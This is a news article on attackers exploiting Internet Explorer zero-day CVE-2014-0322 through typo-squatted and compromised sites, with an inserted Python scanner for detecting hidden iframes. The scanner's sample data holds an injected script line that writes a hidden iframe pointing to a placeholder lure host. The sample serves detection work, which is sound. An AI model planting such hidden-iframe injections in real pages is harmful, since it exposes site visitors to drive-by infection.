Hackers Milk IE Zero Day Before Patch

Attackers have increased their exploitation of an Internet Explorer zero-day vulnerability (CVE-2014-0322) set to be fixed by Microsoft in its regularly scheduled Patch Tuesday release later this afternoon.

In addition to the two websites listed above, Websense reports that three others have been targeted using the same bug: hatobus[dot]co[dot]jp, a Japanese travel site hosted in Tokyo; english[dot]com[dot]tw, the site of a Taiwanese English school hosted in San Antonio, Texas; and chemistry[dot]hku[dot]hk, a Hong Kong University Chemistry Department website hosted in Hong Kong.

It all began with a typo-squatted variety of giffo[dot]asso[dot]fr, the website of the French aerospace company. The attackers set up giffo[dot]assso[dot]net and hosted a malicious iframe there that led to another part of the same domain where the exploit was actually located.

Once this attack began garnering media attention, other criminals began copying it, deploying the same code on different lure sites with different payloads.

In the case of Hatobus, the popular Japanese travel site, attackers buried the redirecting iframe in some JavaScript files on the site. The exploit, too, was hosted on the site itself, which makes it all the more inconspicuous, since redirects to shady third-party domains are generally a dead giveaway for protective software. The exploit code in this case, according to Websense, was nearly identical to that used in the first attack. The only real difference is that the attackers piggybacked a second, Java exploit, which aimed to install a banking trojan targeting customers of a popular Japanese bank. Unlike the earlier, targeted attacks, the Hatobus variety sought to infect as many machines as possible.
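The Hatobus case above turned on a hidden iframe injected into the site's own JavaScript, pointing at an exploit page on the same domain. The following scanner is an added example (not code from the article or from Websense) that a site owner could run over HTML and JavaScript files to flag iframes that are zero-sized or hidden by style, the usual shape of such injections; the sample files and the `example-lure.invalid` host are constructed placeholders, not indicators from the incident.

```python
import re

# Constructed sample: a legitimate menu script with an injected document.write()
# that drops a zero-size, hidden iframe (placeholder host, not a real indicator).
SAMPLE_JS = """
function initMenu() { document.getElementById('m').style.display = 'block'; }
document.write('<iframe src="http://example-lure.invalid/x.html" width="0" height="0" style="visibility:hidden"></iframe>');
"""

# Constructed sample page: one legitimate embed and one injected hidden iframe.
SAMPLE_HTML = """<html><body><h1>Department home</h1>
<iframe src="https://www.youtube.com/embed/abc" width="560" height="315"></iframe>
<iframe src="//example-lure.invalid/r.php" style="display: none"></iframe>
</body></html>"""

IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
# name="dq" | name='sq' | name=bare  (three alternative value groups)
ATTR_RE = re.compile(r"""(\w+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""", re.IGNORECASE)

def suspicious_iframes(text):
    """Return (src, reasons) for every iframe that is zero-sized or hidden.

    The check deliberately does not whitelist same-origin sources: in the
    Hatobus case the exploit page lived on the compromised site itself.
    """
    findings = []
    for tag in IFRAME_RE.finditer(text):
        attrs = {}
        for name, dq, sq, bare in ATTR_RE.findall(tag.group(0)):
            attrs[name.lower()] = dq or sq or bare
        style = attrs.get("style", "").lower().replace(" ", "")
        reasons = []
        if attrs.get("width") in ("0", "0px") or attrs.get("height") in ("0", "0px"):
            reasons.append("zero-size")
        if "display:none" in style or "visibility:hidden" in style:
            reasons.append("hidden-style")
        if reasons:
            findings.append((attrs.get("src", ""), ",".join(reasons)))
    return findings

if __name__ == "__main__":
    for label, sample in (("js", SAMPLE_JS), ("html", SAMPLE_HTML)):
        for src, why in suspicious_iframes(sample):
            print(f"{label}: {src} [{why}]")
```

The scanner only sees iframe markup that appears literally in the file, so a document.write() string that has been split or encoded will slip past it; pairing it with file-integrity monitoring of the site's JavaScript catches the modification itself regardless of how the payload is written.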

The other two attacks were essentially copycats as well. Interestingly, in the case of the Taiwanese English school, the exploit was rather flagrantly hosted on the homepage of the website itself. The Hong Kong University Chemistry Department attack deployed redirecting iframes similar to those in the other incidents.

“It’s evident that the repercussions of exploit code of an unpatched vulnerability that found its way to the public domain can have quite an impact; exploit code that has been crafted for a targeted attack is virtually later on copied and used to drop crimeware binaries,” wrote Websense’s Elad Sharf. “We could see that the exploit code for CVE-2014-0322 was encompassed and served in a variety of ways as it ‘evolved’ in scale: starting from being utilized on a cybersquatted lure website used in low-volume and selected ‘under the radar’ targeted attacks, to being served through hidden iframes and exploit code that was directly placed on compromised websites with the ultimate aim to impact as many browsing users as possible with crimeware.”

About Brian Donohue